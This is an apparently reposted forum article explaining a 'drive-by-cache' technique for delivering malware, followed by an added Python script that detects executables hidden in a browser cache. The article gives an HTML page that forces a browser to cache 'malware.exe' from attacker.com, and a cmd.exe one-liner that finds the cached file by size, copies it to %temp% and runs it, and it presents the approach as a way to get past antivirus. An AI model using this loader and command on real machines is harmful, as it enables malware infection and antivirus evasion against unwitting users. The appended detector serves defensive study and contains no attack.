Drive by Cache Exploits Example & Steering remote Exploitation locally

    Author : "vinnu"
    Team : Legion Of Xtremers
    Special Thanx : Secfence Team
    Greets : Lord DeathStorm, Prashant Uniyal, b0nd, Fb1h2s, G4H, all my well/bad wishers.


    Drive-by-Cache
    This technique is an alternative to the heavily deployed drive-by-download. In this technique
    the shellcode doesn't download anything from a remote location, unlike the drive-by-download
    shellcode.

    In the drive-by-cache technique, the malware is instead downloaded by the browser or application itself.
    The URL of the malware file can be specified in the src of img, script, etc. tags, and the browser/application
    downloads it and saves it into its own cache folder.

    Suppose a malicious executable malware.exe resides on attacker.com; then the following skeleton is enough to force
    the browser to download it:

    <----dbc.htm---->
    <html>
    <body>

    <script src="http://www.attacker.com/malware.exe"></script>

    <!---
    exploit code and shellcode
    --->
    </body>
    </html>
    <!-------------->


    The locations of the cache folders differ between browsers, but all of them reside somewhere deep inside the
    %USERPROFILE% folder.

    The malware gets downloaded prior to the exploitation and is saved into the cache; then the exploit fires up
    and, if successful, the shellcode will hunt for a file with the same number of bytes as malware.exe on the attacker.com
    server.

    The shellcode in this case is command execution. The hard part of this technique is
    searching for the file in the browser's/application's cache, as the file is saved as a temp file in most cases.
    So we need to copy the file with an ".exe" extension and then execute it.

    Suppose we have placed (Windows XP's) calc.exe on the server as malware.exe; then its size is
    114688 bytes, and the following command will hunt for it in the %USERPROFILE% subfolders:


    cmd.exe /c for /R "%USERPROFILE%\" %i IN (*) DO if %~zi equ 114688 cmd.exe /c copy "%i" "%temp%\click.exe" /y & "%temp%\click.exe"


    The above command will copy the found file as click.exe into the %temp% folder and execute it.

    The main advantage of this technique is that most antivirus gets bypassed safely, as the browser/application
    itself downloads the malicious file in the normal way.

    ..."vinnu"
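As an added, defender-side example (not part of vinnu's post): a Python script that hunts a browser/application cache tree for files that carry a PE header whatever their name says, which is exactly the artifact this technique leaves behind, since the dropped binary sits in the cache under a temp-style name with no .exe extension. The cache layout, file names and the minimal "PE" sample are constructed for the demo and are not real binaries.

```python
# Hunt a cache tree for PE executables hidden behind non-executable names.
# Drive-by-cache leaves the dropped binary under a temp-style cache name, so
# this checks content (DOS "MZ" stub + e_lfanew -> "PE\0\0"), not extension.
import os
import struct
import tempfile

EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx"}

def is_pe_file(path):
    """True if the file carries a valid DOS header pointing at a PE signature."""
    try:
        with open(path, "rb") as fh:
            dos_header = fh.read(64)           # IMAGE_DOS_HEADER is 64 bytes
            if len(dos_header) < 64 or dos_header[:2] != b"MZ":
                return False
            e_lfanew = struct.unpack_from("<I", dos_header, 60)[0]
            fh.seek(e_lfanew)
            return fh.read(4) == b"PE\x00\x00"
    except OSError:
        return False

def find_disguised_pe(root):
    """Walk root; return PE files whose extension does not say 'executable'."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if (os.path.splitext(name)[1].lower() not in EXECUTABLE_EXTENSIONS
                    and is_pe_file(path)):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)

def build_sample_cache():
    """Write a constructed mini cache tree (no real binaries); return its root."""
    root = tempfile.mkdtemp(prefix="dbc-demo-")
    dos = bytearray(64)                        # minimal DOS stub, e_lfanew = 64
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 60, 64)
    fake_pe = bytes(dos) + b"PE\x00\x00" + b"\x00" * 20
    samples = {
        "Content.IE5/AB12CD34/malware[1]": fake_pe,               # fetched via <script src>
        "Content.IE5/AB12CD34/ga[1].js": b"var gaJsHost = 'x';",   # ordinary cached script
        "Content.IE5/AB12CD34/notes[1].txt": b"MZ as plain text" + b"\x00" * 60,  # "MZ" but no PE
    }
    for rel, data in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return root
```

Run `find_disguised_pe(build_sample_cache())` for the dry run; on a real host point it at the browser's cache directory instead.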
    This article was originally published in the forum thread "Drive-by-Cache & Steering remote Exploitation locally", started by "vinnu".